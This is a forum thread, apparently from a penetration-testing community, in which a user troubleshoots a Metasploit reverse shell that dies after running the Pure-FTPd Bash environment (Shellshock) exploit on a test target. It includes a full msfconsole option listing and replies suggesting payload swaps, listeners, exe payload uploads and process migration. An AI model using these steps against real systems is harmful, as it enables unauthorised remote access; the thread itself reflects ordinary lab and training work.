shell and meterpreter

This topic contains 17 replies, has 6 voices, and was last updated by  omer 1 year, 9 months ago.



    Hello all,

    I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter. Does anyone know what I am missing? I launched the exploit by hand, target was vulnerable and is compromised.




    Did you set meterpreter as the payload? If so, what is the error?



    I will copy the error as soon as I am back to work; at home I don’t have access to the server.



    In general, to make this work:
    Make sure to generate a meterpreter payload (i.e. windows/meterpreter/reverse_tcp for Windows)
    Start a listener in msfconsole: exploit/multi/handler
    Set the same payload in the handler as in the exploit.

    Run the handler first, then fire the exploit.

    Good luck.



    Thanks, I forgot to run the handler before the exploit.



    Makes sense…
    Cool that you got it working! 😀



    Now I get this strange error ….. Reason: Died from EOFError ….. H E L P please

    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started bind handler
    msf exploit(pureftpd_bash_env_exec) > sessions

    Active sessions

    Id  Type   Information  Connection
    --  ----   -----------  ----------
    1   shell               ->

    msf exploit(pureftpd_bash_env_exec) > sessions -i 1
    [*] Starting interaction with 1...

    [*] – Command shell session 1 closed. Reason: Died from EOFError


    Matt Pardo

    Can you post your Show options output? Redact any Internet-facing IPs, of course.



    I can, I will rerun the procedure.
    The RHOST number above is of course not real, I replaced it with a fake one.



    use exploit/multi/ftp/pureftpd_bash_env_exec
    msf exploit(pureftpd_bash_env_exec) > set TARGET 1
    TARGET => 1
    msf exploit(pureftpd_bash_env_exec) > set PAYLOAD generic/shell_reverse_tcp
    PAYLOAD => generic/shell_reverse_tcp
    msf exploit(pureftpd_bash_env_exec) > set LHOST
    LHOST =>


    This answer I found myself, but it doesn’t help me even a bit:
    EOFError (End of File error) is thrown when you try to carry out an operation on a file object that is already referencing the end of the file. In this example, we are trying to readline when the line doesn’t exist.

    msf exploit(pureftpd_bash_env_exec) > set LPORT 17149
    LPORT => 17149
    msf exploit(pureftpd_bash_env_exec) > set SSLVersion TLS1
    SSLVersion => TLS1
    msf exploit(pureftpd_bash_env_exec) > set RPORT 21
    RPORT => 21
    msf exploit(pureftpd_bash_env_exec) > set SSLVerifyMode PEER
    SSLVerifyMode => PEER
    msf exploit(pureftpd_bash_env_exec) > set VERBOSE 0
    VERBOSE => 0
    msf exploit(pureftpd_bash_env_exec) > set WfsDelay 0
    WfsDelay => 0
    msf exploit(pureftpd_bash_env_exec) > set SSL 0
    SSL => 0
    msf exploit(pureftpd_bash_env_exec) > set ConnectTimeout 10
    ConnectTimeout => 10
    msf exploit(pureftpd_bash_env_exec) > set TCP::send_delay 0
    TCP::send_delay => 0
    msf exploit(pureftpd_bash_env_exec) > set EnableContextEncoding 0
    EnableContextEncoding => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPDEBUG 0
    FTPDEBUG => 0
    msf exploit(pureftpd_bash_env_exec) > set DisablePayloadHandler 0
    DisablePayloadHandler => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPTimeout 16
    FTPTimeout => 16
    msf exploit(pureftpd_bash_env_exec) > set TCP::max_send_size 0
    TCP::max_send_size => 0
    msf exploit(pureftpd_bash_env_exec) > set RHOST
    RHOST =>
    msf exploit(pureftpd_bash_env_exec) > set CMDSTAGER::FLAVOR auto
    msf exploit(pureftpd_bash_env_exec) > set RPATH /bin
    RPATH => /bin
    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on

    • This reply was modified 4 years, 8 months ago by  Zjelko.

    Matt Pardo

    Nothing is obvious from your output. I haven’t seen that error before but that doesn’t mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren’t any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where.



    Thanks for your response,

    The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to list the sessions I can see that a session is open. This wouldn’t be the case if the target wasn’t compromised.
    I haven’t figured it out yet, but I will. I am going for the admin account.

    Thanks again



    I found that some shells and some exploits don’t really work well together.
    In your output above you use generic/shell_reverse_tcp.

    Maybe give linux/x86/shell_reverse_tcp a try instead. I’ve been more successful with that one…



    You should upload an exe payload to the server and run it in order to open a more stable reverse shell.
    I got exactly the same problem with Brainpan 1 (on Vulnhub) last week. I’ve found the shell is more stable if I used a non-meterpreter reverse shell but a standard one.



    Using an executable to set up a reverse meterpreter shell is not always an option… As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot.

    However, looking at the provided options, Zjelko is not using Meterpreter, but a standard reverse shell: generic/shell_reverse_tcp.


    Matt Pardo

    Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options?



    Hello guys,

    Uploading a file isn’t an option yet. I do agree with the both of you and will try to use another, maybe more stable, reverse_shell. Thanks, and I will keep you posted.



    Couple of years late, but have you tried setting the handler via netcat? Worked for me on a similar case and that solved it.
